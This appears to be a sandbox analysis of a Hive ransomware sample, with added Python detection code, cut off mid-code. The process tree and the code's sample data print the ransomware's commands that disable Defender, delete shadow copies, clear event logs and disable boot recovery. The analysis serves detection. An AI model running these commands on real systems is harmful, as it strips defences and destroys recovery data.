3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   512          reg.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   3492         reg.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   3312         reg.exe
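The signatures above record the pre-encryption steps one by one: net.exe stopping backup and shadow-copy related services, vssadmin.exe and wmic.exe touching shadow copies, wevtutil.exe clearing event logs, bcdedit.exe changing boot configuration, MpCmdRun.exe removing Defender definitions, and reg.exe disabling WinDefend and its shell extension. Each of those on its own is also legitimate administration, so the value in detection comes from correlating them under one parent. The Python below is an added example written for this page, not code from the sandbox report or its vendor: it runs simple rules over process-creation records, attributes each hit to the root of its process tree (so net1.exe spawned by net.exe still counts toward the sample), and alerts when one tree shows several distinct ATT&CK techniques. The input is constructed in a Sysmon-like "ts|pid|ppid|image|cmdline" layout: PIDs and the net.exe and reg.exe command lines follow the report, but the arguments given to vssadmin, wmic, wevtutil, bcdedit and MpCmdRun are assumed typical usage, because the report lists only the binaries and privileges for those.

```python
"""Detection rules for the pre-encryption behaviour recorded in this Hive report."""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Tuple


class ProcEvent(NamedTuple):
    ts: int
    pid: int
    ppid: int
    image: str
    cmdline: str


class Finding(NamedTuple):
    rule: str
    technique: str   # MITRE ATT&CK technique ID
    pid: int
    root: int        # top-most ancestor that has its own event in the log
    cmdline: str


# Services the sample stopped with 'net stop <svc> /y' (see the process tree): backup,
# shadow-copy and file-access services. Compared lower-cased and without a per-user
# suffix, so "UnistoreSvc_12af1" matches "unistoresvc".
STOPPED_SERVICES = {"samss", "sdrsvc", "sstpsvc", "ui0detect", "vmicvss", "vss",
                    "wbengine", "webclient", "unistoresvc"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[Tuple[str, str]]:
    """Map one process-creation event to (rule, ATT&CK ID), or None if it is benign."""
    img, cmd = image_name(ev.image), ev.cmdline.lower()
    if img in ("net.exe", "net1.exe"):
        m = re.search(r'\bstop\s+"?(\w+)', cmd)
        if m and m.group(1).split("_")[0] in STOPPED_SERVICES:
            return ("stops backup/VSS service", "T1489")
    elif img == "vssadmin.exe" and "shadows" in cmd and re.search(r"\b(delete|resize)\b", cmd):
        return ("deletes shadow copies", "T1490")
    elif img == "wmic.exe" and "shadowcopy" in cmd and "delete" in cmd:
        return ("deletes shadow copies", "T1490")
    elif img == "wevtutil.exe" and re.search(r"\b(cl|clear-log)\b", cmd):
        return ("clears event log", "T1070.001")
    elif img == "bcdedit.exe" and re.search(r"recoveryenabled|bootstatuspolicy", cmd):
        return ("modifies boot configuration", "T1490")
    elif img == "mpcmdrun.exe" and "-removedefinitions" in cmd:
        return ("deletes Defender definitions", "T1562.001")
    elif img == "reg.exe":
        if "services\\windefend" in cmd and re.search(r"/d\s+4\b", cmd):
            return ("disables WinDefend service", "T1562.001")
        if "contextmenuhandlers\\epp" in cmd and re.search(r"\bdelete\b", cmd):
            return ("removes Defender shell extension", "T1562.001")
    return None


def root_of(pid: int, parent_of: Dict[int, int]) -> int:
    """Walk pid -> ppid up to the highest ancestor that is itself in the log."""
    for _ in range(64):                     # bounded: PID reuse can create loops
        parent = parent_of.get(pid)
        if parent is None or parent not in parent_of:
            return pid
        pid = parent
    return pid


def parse_log(text: str) -> List[ProcEvent]:
    """Parse 'ts|pid|ppid|image|cmdline' lines (the constructed layout used below)."""
    events = []
    for line in text.strip().splitlines():
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(int(ts), int(pid), int(ppid), image, cmdline))
    return events


def analyse(events: List[ProcEvent], min_techniques: int = 3
            ) -> Tuple[List[Finding], Dict[int, List[str]]]:
    """Return every finding and, per process tree, an alert when at least
    min_techniques distinct ATT&CK techniques appear under one root."""
    parent_of = {ev.pid: ev.ppid for ev in events}
    findings = [Finding(*hit, ev.pid, root_of(ev.pid, parent_of), ev.cmdline)
                for ev in events if (hit := classify(ev))]
    per_root: Dict[int, set] = defaultdict(set)
    for f in findings:
        per_root[f.root].add(f.technique)
    alerts = {root: sorted(t) for root, t in per_root.items() if len(t) >= min_techniques}
    return findings, alerts


# Constructed sample. PIDs and the net.exe / reg.exe command lines follow the report;
# the vssadmin, wmic, wevtutil, bcdedit and MpCmdRun arguments are ASSUMED typical
# usage, since the report shows only the binaries. Lines 13-14 form a separate,
# benign tree that must not alert.
SAMPLE_LOG = r"""
1|3132|1000|C:\Users\Admin\AppData\Local\Temp\sample.exe|"C:\Users\Admin\AppData\Local\Temp\sample.exe"
2|2328|3132|C:\Windows\SYSTEM32\net.exe|net.exe stop "SamSs" /y
3|1360|2328|C:\Windows\system32\net1.exe|C:\Windows\system32\net1 stop "SamSs" /y
4|3304|3132|C:\Windows\SYSTEM32\net.exe|net.exe stop "VSS" /y
5|408|3132|C:\Windows\SYSTEM32\net.exe|net.exe stop "UnistoreSvc_12af1" /y
6|3616|3132|C:\Windows\system32\vssadmin.exe|vssadmin delete shadows /all /quiet
7|404|3132|C:\Windows\System32\wbem\WMIC.exe|wmic shadowcopy delete
8|3832|3132|C:\Windows\system32\wevtutil.exe|wevtutil cl Security
9|1580|3132|C:\Windows\system32\bcdedit.exe|bcdedit /set {default} recoveryenabled No
10|604|3132|C:\Program Files\Windows Defender\MpCmdRun.exe|MpCmdRun.exe -RemoveDefinitions -All
11|2168|3132|C:\Windows\system32\reg.exe|reg add HKLM\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
12|3408|3132|C:\Windows\system32\reg.exe|reg delete HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP /f
13|4100|900|C:\Windows\system32\net.exe|net.exe stop "Spooler" /y
14|4200|900|C:\Windows\system32\wevtutil.exe|wevtutil qe Security /c:5
"""

if __name__ == "__main__":
    findings, alerts = analyse(parse_log(SAMPLE_LOG))
    for f in findings:
        print(f"[{f.technique}] tree {f.root} pid {f.pid}: {f.rule}: {f.cmdline}")
    for root, techniques in alerts.items():
        print(f"ALERT: process tree rooted at pid {root} shows {techniques}")
```

The threshold of three distinct techniques is a tuning choice: a backup job stopping VSS, or an administrator clearing a log, each produces one finding and no alert, while the tree in this report produces four distinct techniques (T1070.001, T1489, T1490, T1562.001) from a single parent. Rules are keyed on the image name rather than the command-line text so that a renamed binary or a `net1` child spawned by `net` is still classified; on real Sysmon or EDR data, map the event fields into ProcEvent and feed the same functions.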
Processes
(each entry: [depth in the tree] image path, then the command line, sandbox signatures and PID)
-
[1] C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe
    "C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"
    - Modifies extensions of user files
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 3132
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    PID: 2328
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    PID: 1360
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    PID: 2648
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    PID: 972
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    PID: 896
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    PID: 764
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    PID: 2200
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    PID: 3548
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "vmicvss" /y
    - Suspicious use of WriteProcessMemory
    PID: 3256
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    PID: 3336
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    PID: 3304
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    PID: 3468
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    PID: 1404
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    PID: 1716
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    PID: 1624
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    PID: 1084
-
[2] C:\Windows\SYSTEM32\net.exe
    net.exe stop "UnistoreSvc_12af1" /y
    - Suspicious use of WriteProcessMemory
    PID: 408
-
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_12af1" /y
    PID: 372
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "SamSs" start= disabled
    PID: 692
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "SDRSVC" start= disabled
    PID: 2212
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "SstpSvc" start= disabled
    PID: 904
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "UI0Detect" start= disabled
    PID: 1296
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "vmicvss" start= disabled
    PID: 1236
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "VSS" start= disabled
    PID: 1476
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "wbengine" start= disabled
    PID: 1636
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "WebClient" start= disabled
    PID: 1920
-
[2] C:\Windows\SYSTEM32\sc.exe
    sc.exe config "UnistoreSvc_12af1" start= disabled
    PID: 2236
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    PID: 2168
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    PID: 3408
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    PID: 512
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    PID: 3492
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    PID: 3312
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    PID: 2420
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    PID: 3184
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    PID: 3776
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    PID: 4024
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    PID: 3808
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    PID: 1352
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    PID: 3960
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    PID: 656
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    PID: 960
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    PID: 4016
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    PID: 3596
-
[2] C:\Windows\SYSTEM32\schtasks.exe
    schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    PID: 524
-
[2] C:\Windows\SYSTEM32\schtasks.exe
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    PID: 3424
-
[2] C:\Windows\SYSTEM32\schtasks.exe
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    PID: 1716
-
[2] C:\Windows\SYSTEM32\schtasks.exe
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    PID: 1212
-
[2] C:\Windows\SYSTEM32\schtasks.exe
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    PID: 2032
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    PID: 412
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    PID: 2436
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    PID: 900
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    - Modifies registry class
    PID: 1328
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    - Modifies registry class
    PID: 2324
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    - Modifies registry class
    PID: 2240
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    PID: 2036
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    PID: 2000
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    PID: 2668
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    PID: 3592
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    - Modifies security service
    PID: 760
-
[2] C:\Windows\SYSTEM32\reg.exe
    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    PID: 3456
-
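The reg.exe entries above are the whole Defender shutdown in registry form: the policy key is wiped and re-created with every Disable* value set to 1 (cloud/PUA values set to 0), the Defender services and filter drivers get Start=4 (disabled), the two Defender ETW autologgers are turned off, and the Explorer context-menu handler is removed. The following is an added example, not part of the sandbox report, showing how to parse such reg.exe command lines from a process-creation log into structured operations and judge each one against that pattern. The command lines are copied from the tree; the list, the benign control line and all function and rule names are constructed for this example. It also folds ControlSet00N into CurrentControlSet, since the process command line and the registry-write telemetry often spell the same key differently.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# reg.exe command lines copied from the process tree above, plus one benign
# query as a control.  The list itself is constructed for this example; it is
# not output of the sandbox.
SAMPLE_CMDLINES = [
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f',
    r'reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName',
]

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
HIVE_ALIASES = {'hkey_local_machine': 'hklm', 'hkey_classes_root': 'hkcr',
                'hkey_current_user': 'hkcu'}

POLICY_ROOT = 'hklm\\software\\policies\\microsoft\\windows defender'
SERVICES_ROOT = 'hklm\\system\\currentcontrolset\\services\\'
LOGGER_ROOT = 'hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\'
DEFENDER_SERVICES = {'windefend', 'wdfilter', 'wdboot', 'wdnisdrv', 'wdnissvc',
                     'securityhealthservice'}
DEFENDER_LOGGERS = {'defenderapilogger', 'defenderauditlogger'}
# Policy values whose "off" setting is 0 rather than 1.
ZERO_MEANS_OFF = {'mpenablepus', 'spynetreporting', 'submitsamplesconsent'}


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, honouring double quotes.  shlex is
    avoided on purpose: it would eat the backslashes in registry paths."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN_RE.finditer(cmdline)]


def canon_key(key: str) -> str:
    """Lower-case, expand long hive names and fold ControlSet00N into
    CurrentControlSet so one rule matches whichever spelling the log used."""
    key = key.lower().rstrip('\\')
    hive, sep, rest = key.partition('\\')
    key = HIVE_ALIASES.get(hive, hive) + sep + rest
    return re.sub(r'\\controlset\d{3}(\\|$)', r'\\currentcontrolset\1', key)


@dataclass(frozen=True)
class RegOp:
    action: str            # add, delete, query, ...
    key: str               # canonical key path
    value: Optional[str]   # /v name, None when the whole key is targeted
    data: Optional[str]    # /d payload
    force: bool            # /f present


def parse_reg(cmdline: str) -> Optional[RegOp]:
    """Return the registry operation a reg.exe command line performs, or
    None when the command line is not reg.exe at all."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[0].lower().rsplit('\\', 1)[-1] not in ('reg', 'reg.exe'):
        return None
    value = data = None
    force = False
    i = 3
    while i < len(toks):
        opt = toks[i].lower()
        if opt in ('/v', '/t', '/d') and i + 1 < len(toks):
            if opt == '/v':
                value = toks[i + 1]
            elif opt == '/d':
                data = toks[i + 1]
            i += 2
            continue
        if opt == '/f':
            force = True
        i += 1
    return RegOp(toks[1].lower(), canon_key(toks[2]), value, data, force)


def judge(op: RegOp) -> Optional[str]:
    """Name the Defender-tampering behaviour an operation implements, or
    None when it looks benign."""
    k, v = op.key, (op.value or '').lower()
    if op.action == 'delete' and k == POLICY_ROOT:
        return 'Defender policy key wiped'
    if op.action == 'add' and k.startswith(POLICY_ROOT):
        if v.startswith('disable') and op.data == '1':
            return f'Defender feature disabled by policy: {op.value}'
        if v in ZERO_MEANS_OFF and op.data == '0':
            return f'Defender cloud/PUA setting switched off: {op.value}'
    if op.action == 'add' and k.startswith(SERVICES_ROOT) and v == 'start' and op.data == '4':
        svc = k[len(SERVICES_ROOT):]
        if svc in DEFENDER_SERVICES:
            return f'Defender service/driver set to disabled (Start=4): {svc}'
    if op.action == 'add' and k.startswith(LOGGER_ROOT) and v == 'start' and op.data == '0':
        logger = k[len(LOGGER_ROOT):]
        if logger in DEFENDER_LOGGERS:
            return f'Defender ETW autologger turned off: {logger}'
    if op.action == 'delete' and k.endswith('\\shellex\\contextmenuhandlers\\epp'):
        return 'Defender context-menu handler removed'
    return None


def audit(cmdlines):
    """Pair each flagged command line with its finding; benign lines are skipped."""
    findings = []
    for line in cmdlines:
        op = parse_reg(line)
        verdict = judge(op) if op else None
        if verdict:
            findings.append((verdict, line))
    return findings


if __name__ == '__main__':
    for verdict, line in audit(SAMPLE_CMDLINES):
        print(f'{verdict:62} <- {line}')
```

The parser deliberately keys on the operation (action, key, value, data) rather than on the literal string, so the same rules fire when an operator writes the long hive name, a different ControlSet, or unquoted arguments. Note that the hits here are only the policy side; a machine where these writes succeeded still needs the values reverted and the services re-enabled before Defender is back.
-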
[2] C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin.exe delete shadows /all /quiet
    - Interacts with shadow copies
    PID: 3616
-
[2] C:\Windows\SYSTEM32\wevtutil.exe
    wevtutil.exe cl system
    - Suspicious use of AdjustPrivilegeToken
    PID: 3832
-
[2] C:\Windows\SYSTEM32\wevtutil.exe
    wevtutil.exe cl security
    - Suspicious use of AdjustPrivilegeToken
    PID: 3800
-
[2] C:\Windows\SYSTEM32\wevtutil.exe
    wevtutil.exe cl application
    - Suspicious use of AdjustPrivilegeToken
    PID: 1348
-
[2] C:\Windows\System32\Wbem\wmic.exe
    wmic.exe SHADOWCOPY /nointeractive
    - Suspicious use of AdjustPrivilegeToken
    PID: 764
-
[2] C:\Windows\System32\Wbem\wmic.exe
    wmic.exe shadowcopy delete
    - Suspicious use of AdjustPrivilegeToken
    PID: 404
-
[2] C:\Windows\SYSTEM32\bcdedit.exe
    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit
    PID: 1580
-
[2] C:\Windows\SYSTEM32\bcdedit.exe
    bcdedit.exe /set {default} recoveryenabled no
    - Modifies boot configuration data using bcdedit
    PID: 3160
-
[2] C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    PID: 1084
-
[3] C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - Deletes Windows Defender Definitions
    PID: 604
-
[2] C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    PID: 3348
-
[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    - Suspicious behavior: EnumeratesProcesses
    PID: 596
-
[2] C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    PID: 2432
-
[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    - Suspicious behavior: EnumeratesProcesses
    PID: 2364
-
[2] C:\Windows\SYSTEM32\notepad.exe
    notepad.exe C:\MyEY_HOW_TO_DECRYPT.txt
    - Opens file in notepad (likely ransom note)
    PID: 2684
-
[2] C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"
    PID: 3528
-
[3] C:\Windows\system32\PING.EXE
    ping.exe -n 5 127.0.0.1
    - Runs ping.exe
    PID: 3336
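Read top to bottom, the tree is one pre-encryption sequence: stop and disable backup-related services (net stop, sc config), neuter Defender (reg.exe, schtasks, MpCmdRun -RemoveDefinitions, Set-MpPreference), destroy shadow copies (vssadmin, wmic), clear the System/Security/Application logs (wevtutil), disable boot recovery (bcdedit), open the ransom note, and finally remove the binary from disk with a ping-delayed del. The following is an added example, not part of the sandbox report, that runs a rule set over process-creation events in this shape, maps each hit to its ATT&CK technique, and recognises the self-delete idiom by checking that the del target is the parent process's own image. PIDs, images and command lines are copied from the tree; the Event record layout, the parent PID 0 for the sample, the two benign control rows and every function and rule name are constructed for this example.

```python
import re
from collections import Counter, namedtuple

Event = namedtuple('Event', 'pid ppid image cmdline')

# The sample's on-disk path as reported in the process tree above.
SAMPLE = r'C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe'

# Process-creation events rebuilt from the tree (PIDs and command lines are
# the report's).  The record layout, the sample's parent PID of 0 and the
# benign control rows are constructed for this example.
EVENTS = [
    Event(3132, 0, SAMPLE, f'"{SAMPLE}"'),
    Event(2328, 3132, r'C:\Windows\SYSTEM32\net.exe', 'net.exe stop "SamSs" /y'),
    Event(1360, 2328, r'C:\Windows\system32\net1.exe', r'C:\Windows\system32\net1 stop "SamSs" /y'),
    Event(1476, 3132, r'C:\Windows\SYSTEM32\sc.exe', 'sc.exe config "VSS" start= disabled'),
    Event(4024, 3132, r'C:\Windows\SYSTEM32\reg.exe', r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'),
    Event(1328, 3132, r'C:\Windows\SYSTEM32\reg.exe', r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f'),
    Event(760, 3132, r'C:\Windows\SYSTEM32\reg.exe', r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    Event(1212, 3132, r'C:\Windows\SYSTEM32\schtasks.exe', r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    Event(3616, 3132, r'C:\Windows\SYSTEM32\vssadmin.exe', 'vssadmin.exe delete shadows /all /quiet'),
    Event(3800, 3132, r'C:\Windows\SYSTEM32\wevtutil.exe', 'wevtutil.exe cl security'),
    Event(404, 3132, r'C:\Windows\System32\Wbem\wmic.exe', 'wmic.exe shadowcopy delete'),
    Event(3160, 3132, r'C:\Windows\SYSTEM32\bcdedit.exe', 'bcdedit.exe /set {default} recoveryenabled no'),
    Event(1084, 3132, r'C:\Windows\SYSTEM32\cmd.exe', r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    Event(604, 1084, r'C:\Program Files\Windows Defender\MpCmdRun.exe', r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    Event(2364, 2432, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', 'powershell Set-MpPreference -DisableRealtimeMonitoring $true'),
    Event(2684, 3132, r'C:\Windows\SYSTEM32\notepad.exe', r'notepad.exe C:\MyEY_HOW_TO_DECRYPT.txt'),
    Event(3528, 3132, r'C:\Windows\SYSTEM32\cmd.exe', f'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "{SAMPLE}"'),
    Event(3336, 3528, r'C:\Windows\system32\PING.EXE', 'ping.exe -n 5 127.0.0.1'),
    Event(4242, 3132, r'C:\Windows\SYSTEM32\sc.exe', 'sc.exe query "VSS"'),  # benign control
]

# (ATT&CK label, regex over the lower-cased command line).  The leading
# (?:.*\\)? tolerates a full image path in place of the bare program name.
RULES = [(label, re.compile(rx)) for label, rx in [
    ('T1489 Service Stop', r'^(?:.*\\)?net1?(?:\.exe)? stop '),
    ('T1489 Service Stop', r'^(?:.*\\)?sc(?:\.exe)? config .* start= disabled'),
    ('T1562.001 Impair Defenses: Disable or Modify Tools',
     r'^(?:.*\\)?reg(?:\.exe)? (?:add|delete) "hk.*(?:windows ?defender|windefend|wd(?:boot|filter|nis)|securityhealthservice|defender(?:api|audit)logger|\\epp)'),
    ('T1562.001 Impair Defenses: Disable or Modify Tools', r'set-mppreference -disable\w+ \$true'),
    ('T1562.001 Impair Defenses: Disable or Modify Tools', r'mpcmdrun(?:\.exe)?" -removedefinitions'),
    ('T1562.001 Impair Defenses: Disable or Modify Tools',
     r'^(?:.*\\)?schtasks(?:\.exe)? /change /tn "microsoft\\windows\\(?:windows defender|exploitguard)'),
    ('T1490 Inhibit System Recovery', r'^(?:.*\\)?vssadmin(?:\.exe)? delete shadows'),
    ('T1490 Inhibit System Recovery', r'^(?:.*\\)?wmic(?:\.exe)? shadowcopy delete'),
    ('T1490 Inhibit System Recovery',
     r'^(?:.*\\)?bcdedit(?:\.exe)? /set \{default\} (?:recoveryenabled no|bootstatuspolicy ignoreallfailures)'),
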